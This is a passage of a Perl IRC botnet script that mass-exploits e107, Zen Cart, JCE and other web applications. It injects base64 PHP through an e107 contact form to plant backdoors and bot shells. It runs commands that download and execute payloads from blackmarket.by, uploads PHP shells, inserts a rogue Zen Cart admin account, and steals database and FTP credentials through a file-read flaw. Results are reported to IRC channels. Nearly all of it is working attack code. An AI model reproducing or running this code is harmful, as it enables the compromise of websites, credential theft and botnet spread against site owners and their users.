"maknyus_eplug";@copy("'.$backdoor2.'","e107_plugins/prod.php");@copy("'.$botshell.'","e107_plugins/foto81.php");@copy("'.$botshell2.'","e107_plugins/foto82.php");@copy("'.$botshell3.'","e107_plugins/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_images/pro.php")) { echo "maknyus_eima";@copy("'.$backdoor2.'","e107_images/prod.php");@copy("'.$botshell.'","e107_images/foto81.php");@copy("'.$botshell2.'","e107_images/foto82.php");@copy("'.$botshell3.'","e107_images/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/log/logs/pro.php")) { echo "maknyus_eplog";@copy("'.$backdoor2.'","e107_plugins/log/logs/prod.php");@copy("'.$botshell.'","e107_plugins/log/logs/foto81.php");@copy("'.$botshell2.'","e107_plugins/log/logs/foto82.php");@copy("'.$botshell3.'","e107_plugins/log/logs/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_files/public/avatars/pro.php")) { echo "maknyus_eflica";@copy("'.$backdoor2.'","e107_files/public/avatars/prod.php");@copy("'.$botshell.'","e107_files/public/avatars/foto81.php");@copy("'.$botshell2.'","e107_files/public/avatars/foto82.php");@copy("'.$botshell3.'","e107_files/public/avatars/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/sitebutton_menu/pro.php")) { echo "maknyus_estm";@copy("'.$backdoor2.'","e107_plugins/sitebutton_menu/prod.php");@copy("'.$botshell.'","e107_plugins/sitebutton_menu/foto81.php");@copy("'.$botshell2.'","e107_plugins/sitebutton_menu/foto82.php");@copy("'.$botshell3.'","e107_plugins/sitebutton_menu/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/links_page/pro.php")) { echo "maknyus_elipa";@copy("'.$backdoor2.'","e107_plugins/links_page/prod.php");@copy("'.$botshell.'","e107_plugins/links_page/foto81.php");@copy("'.$botshell2.'","e107_plugins/links_page/foto82.php");@copy("'.$botshell3.'","e107_plugins/links_page/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_files/mediagallery/media_thumbs/pro.php")) { echo "maknyus_efmmtu";@copy("'.$backdoor2.'","e107_files/mediagallery/media_thumbs/prod.php");@copy("'.$botshell.'","e107_files/mediagallery/media_thumbs/foto81.php");@copy("'.$botshell2.'","e107_files/mediagallery/media_thumbs/foto82.php");@copy("'.$botshell3.'","e107_files/mediagallery/media_thumbs/foto83.pl");}'; my $res = &e107_rce_query($test,encode_base64($upload)); if ($res =~ /manteb/) { &get_content("http://".$site."foto81.php"); &get_content("http://".$site."foto82.php"); &get_content("http://".$site."foto83.pl"); &msg("$chan","$e107logo(4,1@4,1$engine0,1)4,1(0,1@4,1SheLL0,1)4,1 http://".$site."0,1contact.php 4,1(0,1@4,1".$sys."0,1)(4,1@0,1safemode-off4,1)");sleep(2); } elsif ($res =~ /maknyus_dthem/) { &get_content("http://".$site."themes/foto81.php"); &get_content("http://".$site."themes/foto82.php"); &get_content("http://".$site."themes/foto83.pl"); &msg("$chan","$e107logo(4,1@0,1$engine4,1)0,1(4,1@0,1SheLL4,1)0,1 http://".$site."4contact.php 4,1(0,1@4,1".$sys."0,1)(4,1@0,1safemode-off4,1)");sleep(2); } elsif ($res =~ /maknyus_dplug/) { &get_content("http://".$site."plugins/foto81.php"); &get_content("http://".$site."plugins/foto82.php"); &get_content("http://".$site."plugins/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_dima/) { &get_content("http://".$site."images/foto81.php"); &get_content("http://".$site."images/foto82.php"); &get_content("http://".$site."images/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_dplog/) { &get_content("http://".$site."plugins/log/logs/foto81.php"); &get_content("http://".$site."plugins/log/logs/foto82.php"); &get_content("http://".$site."plugins/log/logs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_dflicav/) { &get_content("http://".$site."files/public/avatars/foto81.php"); &get_content("http://".$site."files/public/avatars/foto82.php"); &get_content("http://".$site."files/public/avatars/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_dma/) { &get_content("http://".$site."main/foto81.php"); &get_content("http://".$site."main/foto82.php"); &get_content("http://".$site."main/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_ethem/) { &get_content("http://".$site."e107_themes/foto81.php"); &get_content("http://".$site."e107_themes/foto82.php"); &get_content("http://".$site."e107_themes/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_eplug/) { &get_content("http://".$site."e107_plugins/foto81.php"); &get_content("http://".$site."e107_plugins/foto82.php"); &get_content("http://".$site."e107_plugins/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_eima/) { &get_content("http://".$site."e107_images/foto81.php"); &get_content("http://".$site."e107_images/foto82.php"); &get_content("http://".$site."e107_images/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_eplog/) { &get_content("http://".$site."e107_plugins/log/logs/foto81.php"); &get_content("http://".$site."e107_plugins/log/logs/foto82.php"); &get_content("http://".$site."e107_plugins/log/logs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_eflicav/) { &get_content("http://".$site."e107_files/public/avatars/foto81.php"); &get_content("http://".$site."e107_files/public/avatars/foto82.php"); &get_content("http://".$site."e107_files/public/avatars/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_ema/) { &get_content("http://".$site."e107_main/foto81.php"); &get_content("http://".$site."e107_main/foto82.php"); &get_content("http://".$site."e107_main/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_estm/) { &get_content("http://".$site."e107_plugins/sitebutton_menu/foto81.php"); &get_content("http://".$site."e107_plugins/sitebutton_menu/foto82.php"); &get_content("http://".$site."e107_plugins/sitebutton_menu/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_elipa/) { &get_content("http://".$site."e107_plugins/links_page/foto81.php"); &get_content("http://".$site."e107_plugins/links_page/foto82.php"); &get_content("http://".$site."e107_plugins/links_page/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } elsif ($res =~ /maknyus_efmmtu/) { &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto81.php"); &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto82.php"); &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } else { &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4contact.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2); } &e107_spread_query($test); sleep(2); } exit; } sleep(2); } elsif ($html =~ /sUxCrew
sys:(.+?)
/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$backdoor.'","pro.php")) { echo "mantab";@copy("'.$backdoor2.'","prod.php");@copy("'.$botshell.'","foto81.php");@copy("'.$botshell2.'","foto82.php");@copy("'.$botshell3.'","foto83.pl");} elseif(@copy("'.$backdoor.'","themes/pro.php")) { echo "moncrot_dthem";@copy("'.$backdoor2.'","themes/prod.php");@copy("'.$botshell.'","themes/foto81.php");@copy("'.$botshell2.'","themes/foto82.php");@copy("'.$botshell3.'","themes/foto83.pl");} elseif(@copy("'.$backdoor.'","plugins/pro.php")) { echo "moncrot_dplug";@copy("'.$backdoor2.'","plugins/prod.php");@copy("'.$botshell.'","plugins/foto81.php");@copy("'.$botshell2.'","plugins/foto82.php");@copy("'.$botshell3.'","plugins/foto83.pl");} elseif(@copy("'.$backdoor.'","images/pro.php")) { echo "moncrot_dima";@copy("'.$backdoor2.'","images/prod.php");@copy("'.$botshell.'","images/foto81.php");@copy("'.$botshell2.'","images/foto82.php");@copy("'.$botshell3.'","images/foto83.pl");} elseif(@copy("'.$backdoor.'","plugins/log/logs/pro.php")) { echo "moncrot_dplog";@copy("'.$backdoor2.'","plugins/log/logs/prod.php");@copy("'.$botshell.'","plugins/log/logs/foto81.php");@copy("'.$botshell2.'","plugins/log/logs/foto82.php");@copy("'.$botshell3.'","plugins/log/logs/foto83.pl");} elseif(@copy("'.$backdoor.'","files/public/avatars/pro.php")) { echo "moncrot_dflica";@copy("'.$backdoor2.'","files/public/avatars/prod.php");@copy("'.$botshell.'","files/public/avatars/foto81.php");@copy("'.$botshell2.'","files/public/avatars/foto82.php");@copy("'.$botshell3.'","files/public/avatars/foto83.pl");} elseif(@copy("'.$backdoor.'","main/pro.php")) { echo "moncrot_dma";@copy("'.$backdoor2.'","main/prod.php");@copy("'.$botshell.'","main/foto81.php");@copy("'.$botshell2.'","main/foto82.php");@copy("'.$botshell3.'","main/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_themes/pro.php")) { echo "moncrot_ethem";@copy("'.$backdoor2.'","e107_themes/prod.php");@copy("'.$botshell.'","e107_themes/foto81.php");@copy("'.$botshell2.'","e107_themes/foto82.php");@copy("'.$botshell3.'","e107_themes/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/pro.php")) { echo "moncrot_eplug";@copy("'.$backdoor2.'","e107_plugins/prod.php");@copy("'.$botshell.'","e107_plugins/foto81.php");@copy("'.$botshell2.'","e107_plugins/foto82.php");@copy("'.$botshell3.'","e107_plugins/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_images/pro.php")) { echo "moncrot_eima";@copy("'.$backdoor2.'","e107_images/prod.php");@copy("'.$botshell.'","e107_images/foto81.php");@copy("'.$botshell2.'","e107_images/foto82.php");@copy("'.$botshell3.'","e107_images/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/log/logs/pro.php")) { echo "moncrot_eplog";@copy("'.$backdoor2.'","e107_plugins/log/logs/prod.php");@copy("'.$botshell.'","e107_plugins/log/logs/foto81.php");@copy("'.$botshell2.'","e107_plugins/log/logs/foto82.php");@copy("'.$botshell3.'","e107_plugins/log/logs/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_files/public/avatars/pro.php")) { echo "moncrot_eflica";@copy("'.$backdoor2.'","e107_files/public/avatars/prod.php");@copy("'.$botshell.'","e107_files/public/avatars/foto81.php");@copy("'.$botshell2.'","e107_files/public/avatars/foto82.php");@copy("'.$botshell3.'","e107_files/public/avatars/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/sitebutton_menu/pro.php")) { echo "moncrot_estm";@copy("'.$backdoor2.'","e107_plugins/sitebutton_menu/prod.php");@copy("'.$botshell.'","e107_plugins/sitebutton_menu/foto81.php");@copy("'.$botshell2.'","e107_plugins/sitebutton_menu/foto82.php");@copy("'.$botshell3.'","e107_plugins/sitebutton_menu/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/links_page/pro.php")) { echo "moncrot_elipa";@copy("'.$backdoor2.'","e107_plugins/links_page/prod.php");@copy("'.$botshell.'","e107_plugins/links_page/foto81.php");@copy("'.$botshell2.'","e107_plugins/links_page/foto82.php");@copy("'.$botshell3.'","e107_plugins/links_page/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_files/mediagallery/media_thumbs/pro.php")) { echo "moncrot_efmmtu";@copy("'.$backdoor2.'","e107_files/mediagallery/media_thumbs/prod.php");@copy("'.$botshell.'","e107_files/mediagallery/media_thumbs/foto81.php");@copy("'.$botshell2.'","e107_files/mediagallery/media_thumbs/foto82.php");@copy("'.$botshell3.'","e107_files/mediagallery/media_thumbs/foto83.pl");}'; my $res = &e107_rce_query($test,encode_base64($upload)); if ($res =~ /mantab/) { &get_content("http://".$site."foto81.php"); &get_content("http://".$site."foto82.php"); &get_content("http://".$site."foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dthem/) { &get_content("http://".$site."themes/foto81.php"); &get_content("http://".$site."themes/foto82.php"); &get_content("http://".$site."themes/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dplug/) { &get_content("http://".$site."plugins/foto81.php"); &get_content("http://".$site."plugins/foto82.php"); &get_content("http://".$site."plugins/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dima/) { &get_content("http://".$site."images/foto81.php"); &get_content("http://".$site."images/foto82.php"); &get_content("http://".$site."images/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dplog/) { &get_content("http://".$site."plugins/log/logs/foto81.php"); &get_content("http://".$site."plugins/log/logs/foto82.php"); &get_content("http://".$site."plugins/log/logs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dflica/) { &get_content("http://".$site."files/public/avatars/foto81.php"); &get_content("http://".$site."files/public/avatars/foto82.php"); &get_content("http://".$site."files/public/avatars/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_dma/) { &get_content("http://".$site."main/foto81.php"); &get_content("http://".$site."main/foto82.php"); &get_content("http://".$site."main/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_ethem/) { &get_content("http://".$site."e107_themes/foto81.php"); &get_content("http://".$site."e107_themes/foto82.php"); &get_content("http://".$site."e107_themes/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_eplug/) { &get_content("http://".$site."e107_plugins/foto81.php"); &get_content("http://".$site."e107_plugins/foto82.php"); &get_content("http://".$site."e107_plugins/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_eima/) { &get_content("http://".$site."e107_images/foto81.php"); &get_content("http://".$site."e107_images/foto82.php"); &get_content("http://".$site."e107_images/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_eplog/) { &get_content("http://".$site."e107_plugins/log/logs/foto81.php"); &get_content("http://".$site."e107_plugins/log/logs/foto82.php"); &get_content("http://".$site."e107_plugins/log/logs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_eflica/) { &get_content("http://".$site."e107_files/public/avatars/foto81.php"); &get_content("http://".$site."e107_files/public/avatars/foto82.php"); &get_content("http://".$site."e107_files/public/avatars/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_ema/) { &get_content("http://".$site."e107_main/foto81.php"); &get_content("http://".$site."e107_main/foto82.php"); &get_content("http://".$site."e107_main/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_estm/) { &get_content("http://".$site."e107_plugins/sitebutton_menu/foto81.php"); &get_content("http://".$site."e107_plugins/sitebutton_menu/foto82.php"); &get_content("http://".$site."e107_plugins/sitebutton_menu/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_elipa/) { &get_content("http://".$site."e107_plugins/links_page/foto81.php"); &get_content("http://".$site."e107_plugins/links_page/foto82.php"); &get_content("http://".$site."e107_plugins/links_page/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } if ($res =~ /moncrot_efmmtu/) { &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto81.php"); &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto82.php"); &get_content("http://".$site."e107_files/mediagallery/media_thumbs/foto83.pl"); &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } else { &msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4contact.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2); } } exit; } sleep(2); } } } } sub e107_rce_query() { my $url = $_[0]; my $code = $_[1]; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); return $res->content; } sub e107_spread_query() { my $url = $_[0]; my $code = "cd /tmp;perl foto83.pl;wget http://blackmarket.by/theme/mild.txt;perl mild.txt;lwp-download http://blackmarket.by/theme/mild.txt;perl mild.txt;curl -O http://blackmarket.by/theme/mild.txt;perl mild.txt;fetch http://blackmarket.by/theme/mild.txt;perl mild.txt;chmod 755 mild.txt;perl mild.txt;wget http://blackmarket.by/images/sad.gif;php sad.gif;lwp-download http://blackmarket.by/images/sad.gif;php sad.gif;curl -O http://blackmarket.by/images/sad.gif;php sad.gif;fetch http://blackmarket.by/images/sad.gif;pphp sad.gif"; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); #$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub e107_spread_query2() { my $url = $_[0]; my $code = "cd /tmp;wget http://blackmarket.by/theme/perl.txt;perl perl.txt irc.telkom.name;lwp-download http://blackmarket.by/theme/perl.txt;perl perl.txt irc.ds.my;curl -O http://blackmarket.by/theme/perl.txt;perl perl.txt irc.telkom.name;fetch http://blackmarket.by/theme/perl.txt;perl perl.txt irc.telkom.name;chmod 755 perl.txt;perl perl.txt irc.telkom.name;rm -fr perl.txt"; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); #$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub zen_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zenlogo4,1$engine0,1 Searching..."); } my $shell = "http://".$site."images/ipays.php"; my $test = "http://".$site."admin/product.php/password_forgotten.php?action=new_product_preview"; my $html = &zen_upl_query($test); if ($html =~ /new(agent => $uagent); $ua->timeout(10); my $req = $ua->post($url, Content_Type=>'multipart/form-data', Content=>["products_image"=>["ipays.php"]]); return $req->content; } sub zen2_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zenlogo4,1$engine0,1 Searching..."); } my $shell = "http://".$site."images/ipays.php"; my $test = "http://".$site."admin/banner_manager.php/password_forgotten.php?action=insert"; my $html = &zen2_upl_query($test); if ($html =~ /new(agent => $uagent); $ua->timeout(10); my $req = $ua->post($url, Content_Type=>'multipart/form-data', Content=>["banners_image"=>["ipays.php"]]); return $req->content; } sub zen_install() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $test = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /zc_install/){ &zen_install_query($chan,$site,$test,$engine); } } sub zen_install_query() { my $chan = $_[0]; my $url = $_[1]; my $test = $_[2]; my $engine = $_[3]; my $code = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (2283,'magic','localhost','617ec22fbb8f201c366e9848c0eb6925:87');"; my $req = HTTP::Request->new(POST => $test); $req->content_type("application/x-www-form-urlencoded"); $req->content("query_string=".$code); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(3); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /1 statements processed/i ) { &msg("$chan","$zenlogo(4,1$engine0,1) 4,1ADMIN LOGIN FOUND"); &msg("$chanxxx","$zenlogo4,1$engine0,1 ADMIN LOGIN4,1 http://".$url."admin/login.php 0,1User: magic Pass: wew"); } elsif ( $data =~ /Duplicate entry/i ) { &msg("$chan","$zenlogo(4,1$engine0,1) 4,1ADMIN LOGIN FOUND"); &msg("$chanxxx","$zenlogo4,1$engine0,1 ADMIN LOGIN4,1 http://".$url."admin/login.php 0,1User: magic Pass: wew"); } sub zen_sql() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$zenlogo4,1(0,1@4,1$engine0,1)4,1 Scan finish for "); } my $vuln = "http://".$site."extras/ipn_test_return.php"; my $target = &get_content($vuln); if ($target =~ /failed to open stream/){ my $dir =""; if ($target =~ m/in (.*?)\/extras\/ipn_test_return.php<\/b>/) {$dir = $1;} my $data = "http://".$site."/extras/curltest.php?url=file:///".$dir."/includes/configure.php"; my $sql = &get_content($data); my $sql = &get_content($data); if ($sql =~ m/'DB_SERVER', '(.*)'/g) {$serper = $1;} if ($sql =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {$user = $1;} if ($sql =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {$pass = $1;} if ($sql =~ m/'DB_DATABASE', '(.*)'/g) {$dty = $1;} &msg("$chan","$zenlogo4,1(0,1@4,1$engine0,1)4,1 http://".$site." ( 4,1$serper:0,1$user:4,1$pass:0,1$dty )"); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","4,1[+]$zenlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$chan","4,1[+]$$zenlogo0,1$engine 4,1FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","4,1[+]$$zenlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$chan","4,1[+]$$zenlogo0,1$engine 4,1FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$zenlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$user." ".$pass.""); if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$zenlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass.""); } } } } } sub fab_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$fablogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$fablogo15[2@12$engine15]14 Scan finish"); } my $test = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $xmlrpc = "http://".$site."media/arhy.PHP"; my $blackunix = "http://".$site."logs/arhy.php"; my $bot = "http://".$site."media/arhy.php"; my $box = "http://".$site."media/arhy.php"; my $cz = &get_content($test); sleep(2); if ($cz =~ /Import CSV file/i){ my $bogex = $fabfile."?url=".$site; &get_content($bogex); sleep(3); my $check = &get_content($xmlrpc."?clone"); &get_content($box); &get_content($bot); &get_content($bot); if ($check =~ /4nt- Crew/i){ my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my $ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} my $chmod = &get_content($blackunix);sleep(1); if ($chmod =~ /4nt- Crew/i){ &msg("$base","$fablogo15[2@12$engine15][2@12SheLL15]3 ".$blackunix." 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$fablogo15[2@12$engine15][2@12SheLL15]3 ".$blackunix." 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$fablogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } else { &msg("$base","$fablogo15[2@12$engine15][2@12SheLL15]3 ".$xmlrpc." 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$fablogo15[2@12$engine15][2@12SheLL15]3 ".$xmlrpc." 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$fablogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } } exit; } } } } sub jce_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jcelogo4,1$engine0,1 Searching..."); } my $petx = "http://".$site."images/stories/petx.php?baca"; my $petx2 = "cruck://".$site."images/stories/petx.php"; my $explore = "http://".$site."images/stories/explore.php?baca"; my $explore2 = "http://".$site."images/stories/explore.php"; my $colong = &get_content($petx); sleep(2); my $colong2 = &get_content($explore); sleep(2); my $safe = ""; my $os = ""; if($colong =~ /Peterson - Shell/i){ if ($colong =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($colong =~ m/Uname : (.*?)<\/b>/){$os=$1;} if ($colong =~ m/Uid : (.*?)<\/br>/) {$id = $1;} &msg("$admin","$jcelogo4,1$engine 0,1$petx2 $safe $os "); 